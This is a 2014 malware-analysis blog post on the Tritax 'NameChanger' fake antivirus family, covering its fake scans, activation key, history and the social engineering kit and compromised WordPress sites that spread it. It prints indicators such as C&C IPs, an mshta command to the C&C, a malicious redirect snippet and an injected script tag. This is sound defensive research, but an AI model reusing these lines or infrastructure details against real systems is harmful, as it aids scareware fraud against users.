February 3, 2014
Analysis of the Tritax FakeAV family, their active campaign and the FakeAV social engineering kit

This time I’m diving into an active FakeAV campaign, I’ve named it the NameChanger FakeAV, it falls under the Tritax family. Now why I named it the namechanger, just take a look the following image composed of screenshots of all the different samples:

image

Update (27-2-2014): Updated the end of the article with a list of domains and IP’s seen in the past 2 months. Tritax is still active and distributing.

Update (20-3-2014): After sinkholing and taking down  the domains actively with the help of some friends it seems the Tritax actors gave up. The TDS’s stopped redirecting and no new domains are being registered, taking action against this campaign was successful!

Some time ago a friend, @VriesHd, pointed out a FakeAV spreading via businessinsider.com: http://urlquery.net/report.php?id=8495695 Not long after this, a similar thing happened to DailyMotion.com. A writeup for that was done by invincea: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/ Skype advertisement has also been affected by the campaign: http://community.skype.com/t5/Security-Privacy-Trust-and/Skype-ads-in-rotation-have-been-compromised-and-contain-Malware/td-p/2894251

More recently the same campaign was seen by @Malekal redirecting via PopAds delivered advertisement: https://twitter.com/malekal_morte/status/426394544414793728 and another finding: https://twitter.com/malekal_morte/status/430050149650292736

David Jacoby from Securelist also published an article after Tritax started spreading via one of the largest websites in Sweden: http://www.securelist.com/en/blog/208216070/Largest_Website_in_Sweden_Spreading_Malicious_Code

The Tritax family has been around for a long time, the first sample of it was seen around may 2009. The current campaign drops a sample I have named NameChanger.C as its the third FakeAV type from this family that is constantly being repackaged with new names.
I’ll start of with an analysis of the current version of the FakeAV, after this I’ll go into the family, third will be the new FakeAV social engineering kit this group is using with their current campaign. I’ll end with a section which is a hashdump of all the samples I’ve been scraping from their backend.

Analysis

This sample drops from a specialized social engineering kit for FakeAV’s, I’ll get into details about this later. The name for this version is “Windows Accelerator Pro”, MD5: 0a0fd6b228e1edb56067c86304c15861 (VT: 20/48).

It initially installs itself in the usual startup location, the keyname for these samples are “GuardSoftware”:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  • "GuardSoftware"="C:\Documents and Settings\admin\Application Data\guard-hqxl.exe"

The filename is formatted as “guard-%s.exe”, as can be seen when running the sample through OllyDBG in the image below. Since the 1st or 2nd of February samples are now formatted as “svc-%s.exe”.

image

After the sample has installed itself it will force a reboot in order to make sure no other analysis tools are started. When its first ran (before the reboot) it will show a splashscreen:

image

Once the machine has rebooted it will show the usual fake scanning with detection of infected items:

image

Once completed the user gets a listing of all the affected files:

image

When you attempt to clear up the infections by hitting “Remove All” we get a message regarding activation. You cannot clean up until you active the product:

image

Before we activate the ‘product’ lets have a look around at what it ‘can’ do for us:

image
image
image
image
image
image
image
image
image
image

All of course are unavailable to us unless we activate. When enabling one of the options we get the same “Activate” popup.

There’s also an about section in the ‘product’:
image

Besides the fake scanning and available options it will also show a variety of fake warning messages:

image
image
image
image
image
image

Some more aggressive warnings appear from time to time as well:

image
image

We are also, like usual with FakeAV’s, not allowed to start any applications because they are ‘infected’:
image

It also warns us that we are torrenting and that downloading pirated material is a felony:

image


When we click the “Get anonymous connection” button we go back to the activation form again. When we hit the “Activate” button we are greeted by a payment form:

image

The form is retrieved by starting the Microsoft HTA client:

mshta.exe “http://93.115.82.249/?0=16&1=0&2=9&3=p&4=2600&5=1&6=1111&7=byuqshgtbm”

This is the C&C for this FakeAV, all subsequent traffic from this sample will go towards this IP.

Now if we go to the “Register” section we can ‘activate’ the product:
image

We do need a valid key for this one. The key for this sample is:

1W111-111B1-11T11-E1121


Note: If you have any old infections from before July 2012 the key is “0W000-000B0-00T00-E0020”

When we enter the correct key we are allowed to activate:
image

As soon as we hit the “Register” button we are taken back to the scan results page and it will start ‘cleaning’ up the infections:

image

Now if we look at the application it has all turned green and all ‘functionality’ is available to us:
image

The about form is also updated with the activation date and serial:

image

The application stores the activation data in the registry like this:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings]
  • "UID"="lthsidoaat"
  • "net"="2014-1-9_3"
  • "Config"=hex:de,07,01,00,<truncated>

The “Config” key holds the activation key as well:

image

This FakeAV has inbuilt translations for German, French and Spanish:
image
image

I’ve seen the following IP’s for the C&C’s in samples dating from November 2013 until February 2013:

  • 93.115.82.249
  • 93.115.82.248
  • 93.115.86.197

Interesting fact; These guys have been using a valid license for ASProtect for many of their payloads. This makes analyzing and reversing a bit harder, especially unpacking the samples.

The Family

The FakeAV family that was spreading here is called ‘Tritax’. It has been around for a very long time and @S!Ri has been writing about variants of this family for a long time. A big thank you to him for sharing some of the older samples of this family with me to get the timeline correct. You can follow his FakeAV findings here: http://siri-urz.blogspot.fr/


The first sample appeared around may 2009, it was called “Crusader Antivirus”:
image

This one displayed the usual fake warnings and fake scanning like we see now:
image

This FakeAV was meant to look like the AGAVA Antispy application which was a legit application. Crusader mimicked most of the GUI of Antispy:
image

This first sample is in fact where the “Tritax” name comes from, on the about dialog a company was described as “TRITAX Limited”:
image

The samples for this one, MD5: 301b4ca82a0dc6931562e9b322ceb7c1

The 2nd installment of the family was called “SecretService”, this one has had 2 versions:
image
image

After the SecretService version, “Privacy Center” and “Safety Center” popped up:
image
image

After those we were greeted by “Privacy Center” and “Control Center”:
image
image

Now we are greeted with the first NameChanger variant, I’ve named it NameChanger.A. It first appeared in December 2010. It has been seen with the following names:


The GUI has had a few changes but the general look stayed the same. A few samples:
image
image
image

After variant A, the B variant: NameChanger.B appeared in May 2011. It has had the following names:


And looked the same in every sample, only the name constantly changed:
image


And in February 2012 the first version of our NameChanger.C appread, it was named ‘Windows Protection Manager’.
image

This shows how long this group has been active, 2009 until now. Their current campaign is still really active and spreading new versions of NameChanger.C. It seems they have now got a good setup going with the special FakeAV Kit.

The full list of used names so far for NameChanger.C:


The Social Engineering Kit

I encountered the first sample when being redirected from the Businessinsider website. While initially it seemed like a one-off I found out this is an actual package like you would normally see with exploit kits. In this case it relies on social engineering.

When landing on this kit a user is greeted with a javascript alert message:
image

Then a page which shows a fake message from Microsoft Security Essentials. The message lists a number of items that are supposedly infected:

image

When clicking the “Clean computer” message the user is prompted with a download with names like “Setup.exe” or “Install.exe”. This is when the user downloads the FakeAV and manually runs it. This way it looks believable that an Antivirus suddenly comes up talking about infections on your computer.
I have found different FakeAV family campaigns using this Kit, the only one I have seen being updated on the landing page is the one for the Tritax group. Initially the landing page looked like this:



Around the 10th of January it suddenly changed the JavaScript on the landing page to a crypted version.



A week later on the 17th of January the landing changed again, only this time the crypted JavaScript snippets were put in external files called “scr1.js” and “scr2.js”. Landing page code:

During this time the DNS for the landing of the Tritax group is always on a subdomein, this is either ‘b2811a66’, ‘c3913c6c’, ‘e324rfds’, ‘wed322d2’, ‘5c4e4143’ or ‘90d6bc5a’. Of course this will change from time to time, it just means the main domain never points to the landing server, its always a subdomain. Additionally the domains used by this group are registered at registrars allowing for domain tasting (5-day testing period, free!). The domains rotate every so few days. The first registar I saw them appear was Domeny.pl, they are current being tasted at Key-Systems GmbH. These are the stats in terms of TLD’s I have seen:

  • 106 pw
  • 76 nl
  • 30 pl
  • 15 com


Here is a full list of all the domains used in the period of 1st of January 2014 until the 25th of January 2014.



These domains used custom nameservers, @vriesHD has done his best taking these down for the past months. The IP’s I’ve seen used in this campaigns landing pages are:

  • 93.115.82.246
  • 93.115.82.247
  • 93.115.86.199
  • 212.83.137.239
  • 212.83.138.29
  • 212.83.138.30
  • 212.83.155.45

The following domains have been seen for the custom nameservers:

  • dsfe1.com
  • dsfe2.com
  • svav1.com
  • svav2.com
  • stav1.com
  • stav2.com
  • isavx.com
  • isavh.com
  • ispav.com
  • ispax.com

Additionally to advertisment and spam mail spreading these guys have also compromised a large number of websites. All websites compromised are Wordpress websites. A malicious PHP file was uploaded after exploitation. This file gives redirects to domains listed above (and the new ones still being generated). These pages respond with:

window.top.location.replace(” ***tritax campaignlanding page*** “);

They can usually be spotted when websites have javascript snippets loaded like:

<script src=”/wp-includes/js/jquery/jquery.php”></script>


The full list of websites affected (some of them have already cleaned up or have gone offline):


Collected DNS information from January -> February 2014

Collected Samples

Blog comments powered by Disqus